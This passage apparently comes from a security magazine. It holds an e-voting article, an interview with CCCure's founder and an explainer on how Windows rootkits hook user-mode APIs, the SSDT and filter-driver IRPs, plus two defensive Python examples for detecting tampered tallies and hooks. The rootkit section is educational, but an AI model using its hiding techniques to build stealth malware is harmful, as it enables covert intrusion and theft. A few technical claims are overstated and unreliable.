1. Accuracy: The goal of any voting system is to establish the intent of each individual voter, and translate those intents into a final tally. To the extent that a voting system fails to do this, it is undesirable. This characteristic also includes security: it should be impossible to change someone else’s vote, ballot stuff, destroy votes, or otherwise affect the accuracy of the final tally.
2. Anonymity: Secret ballots are fundamental to democracy, and voting systems must be designed to facilitate voter anonymity. This also means confidentiality, in one way or another.
3. Scalability: Voting systems need to be able to handle very large elections. With the increase of population, we need to invest in something that could sustain long enough.
4. Speed: Voting systems should produce results quickly. This is particularly important where people expect to learn the results of their voting on the same day it took place, before bedtime or early the day after, and to monitor the progress of the voting process.

So, these are the four main features that should characterize Electronic Voting, and if we have a system that can do that electronically then this will guarantee neutral and falsification-free votes.

Electronic Voting can be used in presidential elections, parliament members’ elections and also inside the parliament while voting for legislation and policies. We need to forget about the previous “funny” way by which votes inside the parliament were handled and move to E-Voting; the Speaker of the People’s Assembly of Egypt used to check the votes for legislation and policies only by eye!

Let us see how we can implement the Electronic Voting system. Usually the system will have machines all over the country to collect the votes. These machines are connected in a secure way to a central point for analysis and monitoring. So if we spread our devices over 700 sites, for example, and the central point then notices some suspicious activities, investigations may start and track any distrustful activity. But what kind of machines should be used?! Maybe a PC, but it can be infected by a virus or a worm. Maybe a hardened machine! And how can these machines be connected to the sites?

Usually the machines used in E-Voting, in countries like Brazil, India and the USA, are Direct-Recording Electronic (DRE) (2) voting machines. A DRE machine records votes by means of a ballot display provided with mechanical or electro-optical components which can be activated by the voter (typically through buttons or a touchscreen). The data is then processed by means of a computer program, and the voting data and ballot images are recorded in memory components. After the elections, the DRE machine produces a tabulation of the voting data as a soft copy stored on a removable memory component and as a hard copy as well. The system may also provide a means for transmitting individual ballots or vote totals to a central location for consolidating and reporting the results by precinct at the central point. So data can be transferred securely through encrypted links or flash memories, with a backup so as to maintain the confidentiality and integrity of the data. And by having the backup, availability is guaranteed.

[Figure 1: DRE Machine used in Brazil]

These DRE machines should be hardened and certified through audits, so as to ensure security. For sure, the machines may differ from one type of election to another, but the concept is the same.

I believe that in order to have a “Cyber Revolution”, we need to implement systems in our countries which bring technology into our daily lives. And since secure voting is a crucial step in bringing trustworthy entities for the sake of serving our people, special attention should be paid to deploying “Electronic Voting” in our countries.

(1) Adopted from Bruce Schneier’s blog - Schneier on Security
(2) Definition as per Wikipedia

About the author:
Five years of experience in the Information Security Consultation field; possesses deep knowledge and understanding of security threats and countermeasures, security products and technologies, information security management systems, networks and operating systems. Has been in the banking field for 2 years, where money talks and security is a great concern, and also in the Information Security Consultation field, giving consultation and advisory actions to customers to get the best of breed from security solutions and to secure organizations which have different concerns and business objectives. I have right now security certifications like CISSP, CCSP and SSCP, and have a good networking/telecommunication background.
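As an added example, not part of the article: the DRE tabulation flow described above, with each machine's totals authenticated so that the central point can detect an altered, forged or internally inconsistent record before consolidating results by precinct (the "suspicious activity" the article wants the central point to notice). Machine ids, keys and counts are constructed sample values, and HMAC-SHA256 with a per-machine key stands in for whatever the encrypted link or audited transfer medium would provide. Note that the record carries only totals, never voter identities, which is the anonymity characteristic.

```python
import hashlib
import hmac
import json

# Constructed per-machine secret keys. In a real deployment these would be
# provisioned to each certified DRE machine and held by the central point.
MACHINE_KEYS = {
    "DRE-001": b"constructed-key-001",
    "DRE-002": b"constructed-key-002",
}


def make_tabulation(machine_id, precinct, ballots_cast, counts):
    """Build the tabulation record a DRE machine writes to its removable
    memory and transmits: only totals, never individual voter identities."""
    body = {
        "machine": machine_id,
        "precinct": precinct,
        "ballots_cast": ballots_cast,
        "counts": counts,
    }
    payload = json.dumps(body, sort_keys=True).encode()
    tag = hmac.new(MACHINE_KEYS[machine_id], payload, hashlib.sha256).hexdigest()
    return {"machine": machine_id, "payload": payload, "tag": tag}


def verify_tabulation(record):
    """Return (body, None) if the MAC verifies and the totals are internally
    consistent, otherwise (None, reason)."""
    key = MACHINE_KEYS.get(record["machine"])
    if key is None:
        return None, "unknown machine"
    expected = hmac.new(key, record["payload"], hashlib.sha256).hexdigest()
    # Constant-time comparison so the check itself leaks nothing about the tag.
    if not hmac.compare_digest(expected, record["tag"]):
        return None, "MAC mismatch: record altered or forged"
    body = json.loads(record["payload"])
    if body["machine"] != record["machine"]:
        return None, "machine id mismatch"
    if sum(body["counts"].values()) > body["ballots_cast"]:
        return None, "more votes than ballots cast"
    return body, None


def consolidate(records):
    """Central-point consolidation: accepted totals by precinct, plus the
    rejected records with the reason, so an investigation can be opened."""
    totals = {}
    rejected = []
    for record in records:
        body, reason = verify_tabulation(record)
        if body is None:
            rejected.append((record["machine"], reason))
            continue
        precinct_totals = totals.setdefault(body["precinct"], {})
        for candidate, votes in body["counts"].items():
            precinct_totals[candidate] = precinct_totals.get(candidate, 0) + votes
    return totals, rejected


def demo():
    """Two genuine records plus a constructed in-transit alteration of the
    second one (payload changed, tag left as it was)."""
    good = make_tabulation("DRE-001", "P1", 120, {"A": 70, "B": 50})
    good2 = make_tabulation("DRE-002", "P1", 80, {"A": 30, "B": 50})
    tampered = dict(good2)
    tampered["payload"] = good2["payload"].replace(b'"A": 30', b'"A": 80')
    return consolidate([good, good2, tampered])


if __name__ == "__main__":
    print(demo())
```

The same check catches a record whose candidate counts add up to more than the ballots the machine reports having cast, which is the kind of inconsistency a hard-copy tabulation audit would otherwise have to find by hand.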
An Interview with Clement Dupuis
By Moataz Salah

Clement Dupuis is a man whose thoughts and principles you cannot prevent yourself from respecting. His principles and beliefs were one of the main reasons to launch our magazine, Security Kaizen Magazine. Two years ago, I started quoting one of his famous sayings in my lectures: “Don’t be a leecher, don’t suck people’s blood till you get all the information you need; share your knowledge even with just a comment.”

Clement Dupuis, Founder and Maintainer of the CCCure Family of Portals

• Can you introduce yourself to Security Kaizen readers?

Good day to all,
My name is Clement Dupuis. I am the founder and maintainer of the CCCure Family of Portals. Twelve years ago I started to dedicate all of my free time to “Giving Back to the community”, which has been a way of life since then.
I had the privilege to work for 20 years for the Canadian Department of Defense and was exposed to radio communication, satellite communication, and finally I got into the computer world.
I was one of the very early pioneers who were attempting to use the Personal Computer (PC) in places and in ways it was never, ever attempted before. I had to combine modern equipment with outdated radio communication. Often we had to talk with the engineer that wrote the software to make things work. There was no better way to learn the details behind the interfaces that we were using.
Networking, Personal Computers, Servers, and making them work together has been a hobby of mine for more than 20 years. It is always a privilege to have your hobby as your full time job.

• What made you take the Free Information Sharing route instead of selling your knowledge?

As you get past 50 years of age you realize that you do have quite a bit of wisdom and knowledge that you have acquired over the years. At one point you need to get someone ready to take over from you and finally retire.
I am from a small lumberjack village in the deep woods of Quebec, Canada. In my village people always help each other; skills and knowledge are passed from father to son for generations. I thought doing the same on the Information Security side could be a very interesting project.
It started as a hobby and today the Family of Portals reaches over 150,000 security professionals in more than 120 countries around the world. It does make me feel proud when someone sends me a message to thank me and my team for the work we are doing in helping the community.
I was asked many times WHY I do not charge a fee on some of my portals. With the number of members we have, we could be millionaires if I had charged $10 per person. We all need money; however, we never have enough, it is a never ending story. Above money there are people; when I am able to contribute to someone’s career and help them progress and reach higher, I feel a lot better than getting $10 as a fee. People should always be priority number one.

• Can you give us more ideas about your free information sharing web sites and the free services you deliver?

Our portals contain a large collection of documents, links, forums, mailing lists, cram study guides, quizzes, and a whole lot more.
The portals are large containers of knowledge that constantly get updated and better as more and more people are

• What problems did you face when you started your free information sharing web sites?

The first 4 years were very lonely; you spend all of your free time building content, answering queries, and you do not see anything being returned to you. Then all of a sudden my site was listed in books and magazines, which drove a lot of traffic to it.
I felt like quitting the whole project many times. There were days when I would get negative feedback that made me feel like pulling the plug. However, my wife, who is the calm and moderate person behind me, would always remind me that for every negative message I have most likely received 100 positive messages. After a while you learn to concentrate on the positive and accept that you cannot please 100% of your visitors.
Time has always been my biggest challenge over the past 10 years. Maintaining portals is VERY time consuming.

• Which security conferences must Clement Dupuis attend every year?

There are a few that I always attempt to attend, such as BlackHat, Defcon, CanSecWest, and Hacker Halted. They are some of the largest and also some of the best conferences that exist out there.

• You are a big fan of CISSP, why is that?

There are a lot of misconceptions related to the CISSP certification. It is NOT a technical certification; however, it forces a Security Professional to learn more about domains that he would not get exposed to in his daily tasks.
The CISSP shows that a Black Box approach to security will not work. You can stack 10 security appliances and they will still be ineffective if there are no policies, procedures, or processes in place.
People have to realize that hardware or software alone is not the answer to security. You have to have a good mix of policies, people, and process, the 3 P’s.
I was one of the first persons to become a CISSP in Canada. I saw that it was a great package but there was no resource to prepare for it. This is when I decided to create the CCCure.Org web site. I wanted to help others in becoming certified and by the same token better understand what security is all about.

• What is your plan for the next coming years?

I am now at the point where my portals need to move to a better platform that will integrate with the viral world of Social Media. This is one of the major projects to come.
I also need to categorize content by geographical location. People love to know what is in their backyard and what resources they have locally.
Adding a few more certifications is also on the menu. Cloud Security and Risk Management come to mind.

• Can you rate the top 5 magazines in the security world?

This is a tough one. Some magazines cater to management, some others cater to Security Testing, some will be for programmers; as you might have guessed I read a lot of security oriented magazines. On my short list I do have:
- 2600 Quarterly
- Club Hack Magazine
- Hakin9
- HITB Magazine
- (IN)SECURE
- MISC Magazine
- Professional Tester
- SecurityActs
- Security Kaizen
- The Hackademy Journal
- Uninformed

• What is your comment about Security Kaizen Magazine? And what is needed to rank it as one of the best magazines in the Information Security field in the world?

Security Kaizen is a very interesting magazine and once I read through the first edition I knew that it is a magazine that will only get better with time. The magazine is very young compared to other magazines that exist out there.
The success will depend on a few things: Content, Content, and Content.
If you provide great content the readers will come to read it. From what I have seen so far you are on the right path to do so.
Last but not least, ask for feedback and listen to your readers. Ask them what they wish to get and provide it to them. All of this will make it a great success.

• From your experience, what is mostly needed in the Middle East and Arab countries to help them be an added value in the information security field instead of just importing technology?

There is already an amazing number of software and hardware companies coming from the Middle East and Arab countries. Unfortunately some are niche players or are not recognized in their own country.
Information Security and its associated technologies are still something that is up and coming in those regions. Leadership must start at the top at the government level. Cyber Security should no longer be seen as a luxury but as a necessity to conduct business in a connected world.
For the first time in history companies have suffered more losses and fraud online than in the physical world in 2010. Where there are financial transactions and money involved there is also crime. The online world is no different than the physical world; in fact it is a lot easier to commit crime online than risking being caught in the act of doing a physical crime.
Sharing information, educating more people about these issues, and creating a climate favorable to endless learning is one of the most effective tools one can use against criminal activities over our networks and systems.
Rootkits: A Deeper Look
By Amr Thabet

1. What is a rootkit?
The rootkit is simply a programme that gives you permanent access to the “root”, which is the highest privileged user in a UNIX system. The rootkit can easily control the system or modify it on the fly to force it to hide the presence of a specific virus or spyware.

2. Why rootkits?
It gives you permanent access to the infected machine. In the hackers’ belief, it is not enough to penetrate a system or compromise its security defenses; the ability to stay hidden in the system to spy on it or control it for your desired needs is a must. Therefore, rootkits are mainly created to hide the hacker inside the system from administrators, file monitors and firewalls. Some of the hiding techniques are hiding files on the hard disk, a connection port, some registry keys or a running process on the machine.
Furthermore, some other rootkits are especially created for other needs, like a keystroke monitor (keyboard spy), or a packet sniffer, which is a program that monitors all the data that is sent or received by the computer in order to steal passwords or credit cards.

3. Some Definitions:
1. User-mode vs. Kernel-mode:
The computer processor has some type of security called rings. Rings are simply a set of privileges or restrictions, which enable hackers to work on them. There are four rings and they begin with ring-0, which is the highest privilege and is called kernel-mode. Ring-3 is the lowest privilege and is called user-mode. All applications run in user-mode and have specific privileges which they, by all means, cannot exceed. When the operating system runs in kernel-mode, which has the highest privilege, it can do everything, ranging from modifying the memory of the system and modifying the settings of the processor to sending and receiving signals from computer devices.
There is a single way to jump from ring-3 to ring-0, which is done by a processor instruction named “Sysenter” - System Enter - to call a specific function in the operating system.

2. Patching and Hooking:
Hooking is a term given to the process of intercepting or interrupting a call to a system function like ZwQueryDirectoryFile. Some examples are hooks on file-query functions, which either act as modifiers to the input (the path to a certain folder whose files need to be queried), or modifiers to the output (deleting the name of a specific file in order to hide it).
Patching, in like manner, is very similar to hooking. Patching means modifying: modifying the first instructions of a specific function to hook the inputs or the outputs of this function.

4. Types of Rootkits:
1. User-mode Rootkits:
This type of rootkit simply works in user mode and hooks some functions in a specific process; sometimes it loops over all processes except the system processes. It is done by injecting code inside the virtual memory of this process, and then patching the first instructions of the hooked function to force it to call the injected code. Hence, the injected code modifies the input of this function, then resumes the hooked function, modifies the output of the very same function, and at last returns again to the process.
2. Kernel-mode Rootkits:
On the other hand, kernel-mode rootkits, the second type, work inside the system. These rootkits are installed as device drivers and they have the ability to modify the system functions or hook I/O request packets (IRPs), which are sent to the device drivers, for the purpose of modifying the inputs and outputs of this device driver.
Kernel-mode rootkits can hook all processes, including system processes, at once; however, they are harder to detect and remove. The problems of kernel-mode rootkits are mainly due to them being hard to program and very sensitive to changes of the operating system, and sometimes sensitive to changes of devices.

5. How Rootkits Work?
First of all, how Windows works should be understood. Windows is an operating system created to become a layer between the hardware devices and the software applications and users.

[Figure: layered model - Users And Applications / Operating System / Hardware Devices]

It is created to be insensitive to hardware changes, to support multiple users and processes (applications), and to support system security against malformed processes and between users. It provides a static interface between applications and hardware devices called the Application Programming Interface (API). This interface includes many functions that do everything, like managing files and directories, internet connectivity, and so on.
In order to understand the tricks of the rootkits, the way the interface works should be understood first. Thus, the life cycle of executing an API like “FindFirstFileA()”, from user-mode to kernel-mode to the device itself, is shown in the figure below.
[Figure: life cycle of a FindFirstFile() call, as drawn in the article]
User Mode:
- FindFirstFile() calls ZwQueryDirectoryFile().
- ZwQueryDirectoryFile() calls function number (0x91).
- The SYSENTER instruction is executed with function number (0x91).
Kernel Mode:
- Search for function (0x91) in the System Service Dispatch Table (SSDT).
- Execute NtQueryDirectoryFile().
- Send an IRP request to fastfat.sys (and all device drivers attached to it).
- Attached device drivers could change the inputs of the IRP request (pre-operation mode).
- Attached devices could set an IoCompletionRoutine to change the outputs (post-operation mode).
- Send the signal to the device and get the output; execute the IoCompletion routines and return to user.

Each step is explained below, in addition to the hooking mechanism that is used by rootkits.

1. User-Mode Part:
In user-mode, applications have the ability to call one of hundreds of functions in the Windows interface (APIs). As seen in the last example, the application calls FindFirstFileA(), which calls another API named ZwQueryDirectoryFile(), which calls KiFastSystemCall(), which executes the processor instruction “Sysenter” that switches you from user-mode to kernel-mode and executes another function in the system, in kernel-mode, named KiSystemService().
At this part, the user-mode rootkits, as previously explained, have the ability to hook one of these functions by patching its first instructions with other instructions, which allows the rootkit to change the inputs or the outputs of these functions.

2. SSDT:
While executing the “Sysenter” instruction, the processor switches you into kernel-mode (ring-0) and executes the KiSystemService() function, which searches an array named the “System Service Dispatch Table (SSDT)” with the function number as an index into the array, gets a pointer to another function (for the last example, NtQueryDirectoryFile()), and then calls this function, and execution in kernel-mode continues.
At this part, the kernel-mode rootkits, as explained above, have the ability to replace the pointer to a function in the SSDT array with a pointer to another function inside the kernel-mode rootkit. Additionally, other rootkits prefer to hook these functions by patching their first instructions, like the user-mode rootkits.

3. Device Drivers:
After executing the NtQueryDirectoryFile() function, this function sends to the related device driver a request named an “I/O Request Packet (IRP)” to query a specific directory. This packet will be received by the appropriate device driver and all device drivers attached to it.
Windows allows device drivers to be attached to any device driver to filter its input, change its output or complete the request without the need of the real device driver itself. These device driver filters have the ability to change the inputs, as the IRPs are first received, and have the ability to set a function named the “IoCompletionRoutine”. The IoCompletionRoutine is executed after completing the request and before returning to the user or the user-mode application. The IoCompletionRoutine has the ability to change the outputs of this request in order to hide files, for example, or make any other changes.
In a like manner, the rootkits have the ability to filter the inputs and the outputs of any request. Regarding the last example, the rootkit could change the results of this query to hide a file or change its name in the results of the QueryDirectory IRP.

4. Communicating With Devices:
After the device driver gets the IRP, the device driver communicates with the related device, the hard disk for instance, by sending signals to this device or receiving signals from it. After getting the reply from the device, the device driver converts the output to the standard shape for Windows, or converts the output into a higher-level form, and then returns to the user-mode application after calling the IoCompletionRoutine.
In this stage, the rootkits cannot hook the signals to the devices, but some rootkits with other tasks, such as key loggers or packet sniffers, could communicate with the device directly to receive the pressed keys or send an internet packet, bypassing in this way any software filters or hookers. This part is very sensitive to changes of the hardware, which is a very hard task to work on, and actually it is only used by the elite hackers, as most people say.

Conclusion:
The rootkit is considered a programme or a tool that gives root privileges, to be used for the purpose of hiding the presence of a specific virus or spyware. This tool uses the hooking mechanism to filter the inputs or outputs of the system functions, either in user-mode or kernel-mode, to hide the malware process. By the same token, it can hide files from the outputs of any query, as if there is no malware on the computer. Some other rootkits use these privileges to log the key presses or sniff the internet packets to steal passwords or intrude on someone’s privacy.
This article has also described the life cycle of executing a system query, from user-mode to kernel-mode to the hardware devices, replying to someone’s request with a high-level reply and with transparency to hardware changes.

About the author:
I’m Amr Thabet. I’m a freelance Malware Researcher and a student at Alexandria University, Faculty of Engineering, in the last year.
I’m the author of the Pokas x86 Emulator, a speaker at Cairo Security Camp 2010 and invited to become a speaker at the Athcon Security Conference 2011 in Athens, Greece.
I began programming at 14. I have read many books and research papers in the malware, reversing and antivirus fields, and I have been a reverser for nearly 4 years.
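As an added, defender-side example, not code from the article or its author: the two hooking mechanisms the article describes, patching a function's first instructions and replacing an SSDT pointer, both leave traces that anti-rootkit and memory-forensics tools look for. The Python below works on constructed byte strings and addresses rather than a live system. It compares the first bytes of a function as found in memory against the clean prologue from its on-disk image, recognising the usual redirect patterns (jmp rel32, jmp [abs], push/ret) and computing where the patch jumps to, and it flags SSDT entries that point outside the kernel image. The prologue bytes, function address, SSDT contents and kernel range are all constructed sample values.

```python
import struct

# Constructed sample: the hot-patchable prologue of a Win32 API
# (mov edi,edi; push ebp; mov ebp,esp) as read from the clean on-disk DLL.
CLEAN_PROLOGUE = bytes.fromhex("8bff558bec")


def classify_prologue(func_addr, observed, expected=CLEAN_PROLOGUE):
    """Compare the first bytes of a function in memory with its on-disk
    prologue. Returns (verdict, target); target is the address the patch
    redirects execution to when it can be computed, otherwise None."""
    if not observed:
        return "unreadable", None
    if observed[: len(expected)] == expected:
        return "clean", None
    # jmp rel32: the displacement is relative to the end of the 5-byte instruction.
    if observed[0] == 0xE9 and len(observed) >= 5:
        rel = struct.unpack_from("<i", observed, 1)[0]
        return "inline hook (jmp rel32)", (func_addr + 5 + rel) & 0xFFFFFFFF
    # jmp dword ptr [abs]: the operand is the address holding the target pointer.
    if observed[:2] == b"\xff\x25" and len(observed) >= 6:
        return "inline hook (jmp [abs])", struct.unpack_from("<I", observed, 2)[0]
    # push imm32; ret: the pushed immediate is the target.
    if observed[0] == 0x68 and len(observed) >= 6 and observed[5] == 0xC3:
        return "inline hook (push/ret)", struct.unpack_from("<I", observed, 1)[0]
    return "modified (unknown patch)", None


def find_hooked_ssdt_entries(ssdt, kernel_base, kernel_size):
    """Return [(index, address)] for SSDT entries that point outside the
    kernel image, i.e. into some other driver, which is where an SSDT-hooking
    rootkit places its replacement function."""
    lo, hi = kernel_base, kernel_base + kernel_size
    return [(i, addr) for i, addr in enumerate(ssdt) if not (lo <= addr < hi)]


def demo():
    """Constructed snapshot: one function patched with jmp rel32 to
    0x20005000, and an SSDT whose third entry points outside the kernel."""
    func_addr = 0x10001000
    patched = bytes.fromhex("e9fb3f0010")  # jmp to 0x20005000
    ssdt = [0x80401234, 0x80425678, 0xF8A10000]
    return (
        classify_prologue(func_addr, patched),
        find_hooked_ssdt_entries(ssdt, kernel_base=0x80400000, kernel_size=0x200000),
    )


if __name__ == "__main__":
    print(demo())
```

In a real check the "observed" bytes come from the live process or kernel memory and the "expected" bytes from the file on disk (or a known-good copy), and a legitimate hot-patch from the vendor looks exactly like a hook, so a hit is a lead for investigation, not a verdict on its own.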